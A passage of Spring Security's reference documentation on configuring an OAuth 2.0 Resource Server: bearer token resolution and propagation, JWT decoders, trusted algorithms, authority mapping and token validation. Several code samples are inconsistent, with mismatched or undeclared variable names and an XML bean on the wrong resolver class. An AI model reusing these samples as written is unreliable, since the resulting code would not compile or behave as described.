.oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(new HeaderBearerTokenResolver(\"x-goog-iap-jwt-assertion\"))\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <constructor-arg value=\"x-goog-iap-jwt-assertion\"\/>\n<\/bean>\n----\n====\n\n==== Reading the Bearer Token from a Form Parameter\n\nOr, you may wish to read the token from a form parameter, which you can do by configuring the `DefaultBearerTokenResolver`, as you can see below:\n\n.Form Parameter Bearer Token\n====\n.Java\n[source,java,role=\"primary\"]\n----\nDefaultBearerTokenResolver resolver = new DefaultBearerTokenResolver();\nresolver.setAllowFormEncodedBodyParameter(true);\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(resolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <property name=\"allowFormEncodedBodyParameter\" value=\"true\"\/>\n<\/bean>\n----\n====\n\n=== Bearer Token Propagation\n\nNow that you're resource server has validated the token, it might be handy to pass it to downstream services.\nThis is quite simple with `{security-api-url}org\/springframework\/security\/oauth2\/server\/resource\/web\/reactive\/function\/client\/ServletBearerExchangeFilterFunction.html[ServletBearerExchangeFilterFunction]`, which you can see in the following example:\n\n[source,java]\n----\n@Bean\npublic WebClient rest() {\n return WebClient.builder()\n .filter(new ServletBearerExchangeFilterFunction())\n .build();\n}\n----\n\nWhen the above `WebClient` is used to perform requests, Spring Security will look up the current `Authentication` and extract any `{security-api-url}org\/springframework\/security\/oauth2\/core\/AbstractOAuth2Token.html[AbstractOAuth2Token]` credential.\nThen, it will propagate that token in the `Authorization` header.\n\nFor example:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .retrieve()\n .bodyToMono(String.class)\n .block()\n----\n\nWill invoke the `https:\/\/other-service.example.com\/endpoint`, adding the bearer token `Authorization` header for you.\n\nIn places where you need to override this behavior, it's a simple matter of supplying the header yourself, like so:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .headers(headers -> headers.setBearerAuth(overridingToken))\n .retrieve()\n .bodyToMono(String.class)\n .block()\n----\n\nIn this case, the filter will fall back and simply forward the request onto the rest of the web filter chain.\n\n[NOTE]\nUnlike the {security-api-url}org\/springframework\/security\/oauth2\/client\/web\/reactive\/function\/client\/ServletOAuth2AuthorizedClientExchangeFilterFunction.html[OAuth 2.0 Client filter function], this filter function makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please use the OAuth 2.0 Client filter.\n\n==== `RestTemplate` support\n\nThere is no `RestTemplate` equivalent for `ServletBearerExchangeFilterFunction` at the moment, but you can propagate the request's bearer token quite simply with your own interceptor:\n\n[source,java]\n----\n@Bean\nRestTemplate rest() {\n\tRestTemplate rest = new RestTemplate();\n\trest.getInterceptors().add((request, body, execution) -> {\n\t\tAuthentication authentication = SecurityContextHolder.getContext().getAuthentication();\n\t\tif (authentication == null) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tif (!(authentication.getCredentials() instanceof AbstractOAuth2Token)) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tAbstractOAuth2Token token = (AbstractOAuth2Token) authentication.getCredentials();\n\t request.getHeaders().setBearerAuth(token.getTokenValue());\n\t return execution.execute(request, body);\n\t});\n\treturn rest;\n}\n----\n\n\n[NOTE]\nUnlike the {security-api-url}org\/springframework\/security\/oauth2\/client\/OAuth2AuthorizedClientManager.html[OAuth 2.0 Authorized Client Manager], this filter interceptor makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please create an interceptor using the <<oauth2client,OAuth 2.0 Authorized Client Manager>>.\n\n[[oauth2resourceserver-bearertoken-failure]]\n=== Bearer Token Failure\n\nA bearer token may be invalid for a number of reasons. For example, the token may no longer be active.\n\nIn these circumstances, Resource Server throws an `InvalidBearerTokenException`.\nLike other exceptions, this results in an OAuth 2.0 Bearer Token error response:\n\n[source,http request]\n----\nHTTP\/1.1 401 Unauthorized\nWWW-Authenticate: Bearer error_code=\"invalid_token\", error_description=\"Unsupported algorithm of none\", error_uri=\"https:\/\/tools.ietf.org\/html\/rfc6750#section-3.1\"\n----\n\nAdditionally, it is published as an `AuthenticationFailureBadCredentialsEvent`, which you can <<servlet-events,listen for in your application>> like so:\n\n[source,java]\n----\n@Component\npublic class FailureEvents {\n\t@EventListener\n public void onFailure(AuthenticationFailureEvent failure) {\n\t\tif (badCredentials.getAuthentication() instanceof BearerTokenAuthenticationToken) {\n\t\t \/\/ ... handle\n }\n }\n}\n----\n","old_contents":"[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using two forms of OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens]:\n\n* https:\/\/tools.ietf.org\/html\/rfc7519[JWT]\n* Opaque Tokens\n\nThis is handy in circumstances where an application has delegated its authority management to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by resource servers to authorize requests.\n\n[NOTE]\n====\nWorking samples for both {gh-samples-url}\/boot\/oauth2resourceserver[JWTs] and {gh-samples-url}\/boot\/oauth2resourceserver-opaque[Opaque Tokens] are available in the {gh-samples-url}[Spring Security repository].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-jwt-minimalconfiguration]]\n=== Minimal Configuration for JWTs\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nIn a Spring Boot application, to specify which authorization server to use, simply do:\n\n[source,yml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\/issuer\n----\n\nWhere `https:\/\/idp.example.com\/issuer` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that one of `https:\/\/idp.example.com\/issuer\/.well-known\/openid-configuration`, `https:\/\/idp.example.com\/.well-known\/openid-configuration\/issuer`, or `https:\/\/idp.example.com\/.well-known\/oauth-authorization-server\/issuer` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint or a https:\/\/tools.ietf.org\/html\/rfc8414#section-3[Authorization Server Metadata] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration or Authorization Server Metadata endpoint, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n[source,html]\n----\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n----\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT, Resource Server will:\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWT\n2. Validate the JWT's `exp` and `nbf` timestamps and the JWT's `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate JWTs.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwt-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-jwt-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwt-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support any configuration endpoints, or if Resource Server must be able to start up independently from the authorization server, then the `jwk-set-uri` can be supplied as well:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n----\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nWe still specify the `issuer-uri` so that Resource Server still validates the `iss` claim on incoming JWTs.\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwt-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-jwt-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server. When including `spring-security-oauth2-jose`, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtAuthenticationConverter = myConverter()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n\n.JWT Decoder\n====\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromIssuerLocation(issuerUri);\n}\n----\n====\n\n[NOTE]\nCalling `{security-api-url}org\/springframework\/security\/oauth2\/jwt\/JwtDecoders.html#fromIssuerLocation-java.lang.String-[JwtDecoders#fromIssuerLocation]` is what invokes the Provider Configuration or Authorization Server Metadata endpoint in order to derive the JWK Set Uri.\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `JwtDecoder` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default JWT Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"jwtDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `JwtDecoder` like so:\n\n.JWT Decoder\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"jwtDecoder\"\n class=\"org.springframework.security.oauth2.jwt.JwtDecoders\"\n factory-method=\"fromIssuerLocation\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.jwt.jwk-set-uri}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-jwt-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwt-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n.JWK Set Uri Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwkSetUri = \"https:\/\/idp.example.com\/.well-known\/jwks.json\"\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.com\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-jwt-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n.JWT Decoder Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwtDecoder extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwtDecoder : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtDecoder = myCustomDecoder()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"myCustomDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-jwt-validation,validation>>, <<oauth2resourceserver-jwt-claimsetmapping,mapping>>, or <<oauth2resourceserver-jwt-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-jwt-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-algorithm]]\n=== Configuring Trusted Algorithms\n\nBy default, `NimbusJwtDecoder`, and hence Resource Server, will only trust and verify tokens using `RS256`.\n\nYou can customize this via <<oauth2resourceserver-jwt-boot-algorithm,Spring Boot>>, <<oauth2resourceserver-jwt-decoder-builder,the NimbusJwtDecoder builder>>, or from the <<oauth2resourceserver-jwt-decoder-jwk-response,JWK Set response>>.\n\n[[oauth2resourceserver-jwt-boot-algorithm]]\n==== Via Spring Boot\n\nThe simplest way to set the algorithm is as a property:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n jws-algorithm: RS512\n jwk-set-uri: https:\/\/idp.example.org\/.well-known\/jwks.json\n----\n\n[[oauth2resourceserver-jwt-decoder-builder]]\n==== Using a Builder\n\nFor greater power, though, we can use a builder that ships with `NimbusJwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).build();\n}\n----\n\nCalling `jwsAlgorithm` more than once will configure `NimbusJwtDecoder` to trust more than one algorithm, like so:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).jwsAlgorithm(EC512).build();\n}\n----\n\nOr, you can call `jwsAlgorithms`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithms(algorithms -> {\n algorithms.add(RS512);\n algorithms.add(EC512);\n }).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-jwk-response]]\n==== From JWK Set response\n\nSince Spring Security's JWT support is based off of Nimbus, you can use all it's great features as well.\n\nFor example, Nimbus has a `JWSKeySelector` implementation that will select the set of algorithms based on the JWK Set URI response.\nYou can use it to generate a `NimbusJwtDecoder` like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n \/\/ makes a request to the JWK Set endpoint\n JWSKeySelector<SecurityContext> jwsKeySelector =\n JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(this.jwkSetUrl);\n\n DefaultJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n jwtProcessor.setJWSKeySelector(jwsKeySelector);\n\n return new NimbusJwtDecoder(jwtProcessor);\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key]]\n=== Trusting a Single Asymmetric Key\n\nSimpler than backing a Resource Server with a JWK Set endpoint is to hard-code an RSA public key.\nThe public key can be provided via <<oauth2resourceserver-jwt-decoder-public-key-boot,Spring Boot>> or by <<oauth2resourceserver-jwt-decoder-public-key-builder,Using a Builder>>.\n\n[[oauth2resourceserver-jwt-decoder-public-key-boot]]\n==== Via Spring Boot\n\nSpecifying a key via Spring Boot is quite simple.\nThe key's location can be specified like so:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n public-key-location: classpath:my-key.pub\n----\n\nOr, to allow for a more sophisticated lookup, you can post-process the `RsaKeyConversionServicePostProcessor`:\n\n[source,java]\n----\n@Bean\nBeanFactoryPostProcessor conversionServiceCustomizer() {\n return beanFactory ->\n beanFactory.getBean(RsaKeyConversionServicePostProcessor.class)\n .setResourceLoader(new CustomResourceLoader());\n}\n----\n\nSpecify your key's location:\n\n```yaml\nkey.location: hfds:\/\/my-key.pub\n```\n\nAnd then autowire the value:\n\n```java\n@Value(\"${key.location}\")\nRSAPublicKey key;\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key-builder]]\n==== Using a Builder\n\nTo wire an `RSAPublicKey` directly, you can simply use the appropriate `NimbusJwtDecoder` builder, like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withPublicKey(this.key).build();\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-secret-key]]\n=== Trusting a Single Symmetric Key\n\nUsing a single symmetric key is also simple.\nYou can simply load in your `SecretKey` and use the appropriate `NimbusJwtDecoder` builder, like so:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withSecretKey(this.key).build();\n}\n----\n\n[[oauth2resourceserver-jwt-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n.Authorization Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/contacts\/**\", hasAuthority(\"SCOPE_contacts\"))\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_messages\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n[source,java]\n----\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n----\n\n[[oauth2resourceserver-jwt-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`, which is responsible for converting a `Jwt` into an `Authentication`.\n\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of granted authorities.\nLet's say that that your authorization server communicates authorities in a custom claim called `authorities`.\nIn that case, you can configure the claim that `JwtAuthenticationConverter` should inspect, like so:\n\n.Authorities Claim Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class CustomAuthoritiesClaimName extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(jwtAuthenticationConverter())\n )\n );\n }\n}\n\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthoritiesClaimName(\"authorities\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authoritiesClaimName\" value=\"authorities\"\/>\n<\/bean>\n----\n====\n\nYou can also configure the authority prefix to be different as well.\nInstead of prefixing each authority with `SCOPE_`, you can change it to `ROLE_` like so:\n\n.Authorities Prefix Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthorityPrefix(\"ROLE_\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authorityPrefix\" value=\"ROLE_\"\/>\n<\/bean>\n----\n====\n\nOr, you can remove the prefix altogether by calling `JwtGrantedAuthoritiesConverter#setAuthorityPrefix(\"\")`.\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n[source,java]\n----\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n----\n\n[[oauth2resourceserver-jwt-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-jwt-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-jwt-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n----\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-jwt-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n[source,java]\n----\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new JwtClaimValidator<List<String>>(AUD, aud -> aud.contains(\"messaging\"));\n}\n----\n\nOr, for more control you can implement your own `OAuth2TokenValidator`:\n\n[source,java]\n----\nstatic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"custom_code\", \"Custom error message\", null);\n\n @Override\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return 